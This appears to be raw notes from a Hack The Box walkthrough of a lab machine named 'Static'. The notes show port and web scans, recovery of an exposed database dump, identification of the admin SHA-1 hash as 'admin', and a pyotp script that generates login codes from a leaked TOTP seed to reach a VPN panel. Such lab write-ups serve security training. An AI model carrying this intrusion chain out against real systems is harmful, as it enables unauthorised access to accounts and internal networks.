$ nmap -Pn 10.129.128.160
PORT STATE SERVICE
22/tcp open ssh
2222/tcp open EtherNetIP-1
8080/tcp open http-proxy
$ sudo nmap -p 2222 -T4 -A 10.129.128.160
PORT STATE SERVICE VERSION
2222/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 a9:a4:5c:e3:a9:05:54:b1:1c:ae:1b:b7:61:ac:76:d6 (RSA)
| 256 c9:58:53:93:b3:90:9e:a0:08:aa:48:be:5e:c4:0a:94 (ECDSA)
|_ 256 c7:07:2b:07:43:4f:ab:c8:da:57:7f:ea:b5:50:21:bd (ED25519)
$ sudo nmap -p 8080 -T4 -A 10.129.128.160
8080/tcp open http Apache httpd 2.4.38 ((Debian))
| http-robots.txt: 2 disallowed entries
|_/vpn/ /.ftp_uploads/
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
$ nikto -h http://10.129.128.160:8080
+ Server: Apache/2.4.38 (Debian)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Server banner has changed from 'Apache/2.4.38 (Debian)' to 'Apache/2.4.29 (Ubuntu)' which may suggest a WAF, load balancer or proxy is in place
+ Cookie PHPSESSID created without the httponly flag
+ Entry '/vpn/' in robots.txt returned a non-forbidden or redirect HTTP code (302)
+ OSVDB-3268: /.ftp_uploads/: Directory indexing found.
+ Entry '/.ftp_uploads/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ "robots.txt" contains 2 entries which should be manually viewed.
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ OSVDB-3233: /icons/README: Apache default file found.
$ dirb 10.129.128.160:8080
---- Scanning URL: http://10.129.128.160:8080/ ----
+ http://10.129.128.160:8080/index.php (CODE:200|SIZE:0)
+ http://10.129.128.160:8080/robots.txt (CODE:200|SIZE:55)
+ http://10.129.128.160:8080/server-status (CODE:403|SIZE:281)
$ echo 10.129.129.126 static.htb | sudo tee -a /etc/hosts
OWASP ZAP
http://10.129.128.160:8080/vpn/login.php
curl -i -s -k -X 'POST' \
-H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0' -H 'Pragma: no-cache' -H 'Cache-Control: no-cache' -H 'Content-Type: application/x-www-form-urlencoded' -H 'Content-Length: 38' -H 'Referer: http://10.129.128.160:8080/vpn/login.php' -H 'Cookie: PHPSESSID=9agp3nerpthlsbl1rceh72or17' -H '' \
--data-binary $'username=ZAP&password=ZAP&submit=Login' \
'http://10.129.128.160:8080/vpn/login.php'
http://10.129.128.160:8080/.ftp_uploads/
http://10.129.128.160:8080/robots.txt
User-agent: *
Disallow: /vpn/
Disallow: /.ftp_uploads/
kali@kali:~/0.htb/machines/Static$ file db.sql.gz
db.sql.gz: gzip compressed data, was "db.sql", last modified: Thu Jun 18 15:43:42 2020, from Unix, original size modulo 2^32 355
kali@kali:~/0.htb/machines/Static$
kali@kali:~/0.htb/machines/Static/$ dos2unix -f db.sql.gz
kali@kali:~/0.htb/machines/Static/$ gunzip db.sql.gz
kali@kali:~/0.htb/machines/Static/$ cat db.sql
CREATE DATABASE static;
USE static;
CREATE TABLE users ( id smallint unsigned not null auto_increment, username varchar(20) not null, password varchar(40) not null, totp varchar(16) not null, primary key (id) );
INSERT INTO users ( id, username, password, totp ) VALUES ( null, 'admin', 'd033e22ae348aeb5660fc2140aec35850c4da997', 'orxxi4c7orxwwzlo' );
cyberchef
d033e22ae348aeb5660fc2140aec35850c4da997
Hash length: 40
Byte length: 20
Bit length: 160
Based on the length, this hash could have been generated by one of the following hashing functions:
SHA-1
SHA-0
FSB-160
HAS-160
HAVAL-160
RIPEMD-160
Tiger-160
kali@kali:~/0.htb/machines/Static$ hashid d033e22ae348aeb5660fc2140aec35850c4da997
Analyzing 'd033e22ae348aeb5660fc2140aec35850c4da997'
[+] SHA-1
[+] Double SHA-1
[+] RIPEMD-160
[+] Haval-160
[+] Tiger-160
[+] HAS-160
[+] LinkedIn
[+] Skein-256(160)
[+] Skein-512(160)
kali@kali:~/0.htb/machines/Static$
kali@kali:~/0.htb/machines/Static$ hash-identifier
HASH: d033e22ae348aeb5660fc2140aec35850c4da997
Possible Hashs:
[+] SHA-1
[+] MySQL5 - SHA-1(SHA-1($pass))
decode: admin
kali@kali:~/0.htb/machines/Static/$ echo -n admin | sha1deep
d033e22ae348aeb5660fc2140aec35850c4da997
kali@kali:~/0.htb/machines/Static/$ echo -n admin | sha1sum
d033e22ae348aeb5660fc2140aec35850c4da997 -
kali@kali:~/0.htb/machines/Static/$
http://10.129.129.90:8080/vpn/login.php
admin / admin
totp.py
import pyotp
totp = pyotp.TOTP('orxxi4c7orxwwzlo')
print(totp.now())
http://10.129.129.90:8080/vpn/panel.php
Static Inc.
Internal IT Support portal
Common Name = Generate
Server Address Status
pub 172.17.0.10 Offline
web 172.20.0.10 Online
db 172.20.0.11 Online
vpn 172.30.0.1 Online
pki 192.168.254.3 Online
five ovpn files generated.